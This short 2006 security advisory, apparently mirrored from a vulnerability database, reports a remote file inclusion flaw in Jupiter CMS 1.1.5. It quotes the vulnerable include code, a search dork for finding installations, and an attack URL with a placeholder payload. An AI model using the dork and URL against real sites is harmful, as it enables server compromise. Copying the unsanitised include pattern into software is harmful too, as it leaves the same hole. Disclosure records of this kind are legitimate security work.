Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14058
HistoryAug 28, 2006 - 12:00 a.m.

Jupiter CMS 1.1.5 index.php Remote File Include

2006-08-2800:00:00
vulners.com
14

##################################################################################
#Jupiter CMS 1.1.5 index.php Remote File Include

#F0und by : D3nGeR
#E-mail : [email protected]
##################################################################################

the code

#$template = "default";

include "templates/$template/id.php";

$db->updateRow("config",array('value' => 'default'),"variable = 'template'");

##################################################################################

The Expl

dork : powered by Jupiter CMS

#www.sitename.com/path/index.php?template=[Evil Code]

##################################################################################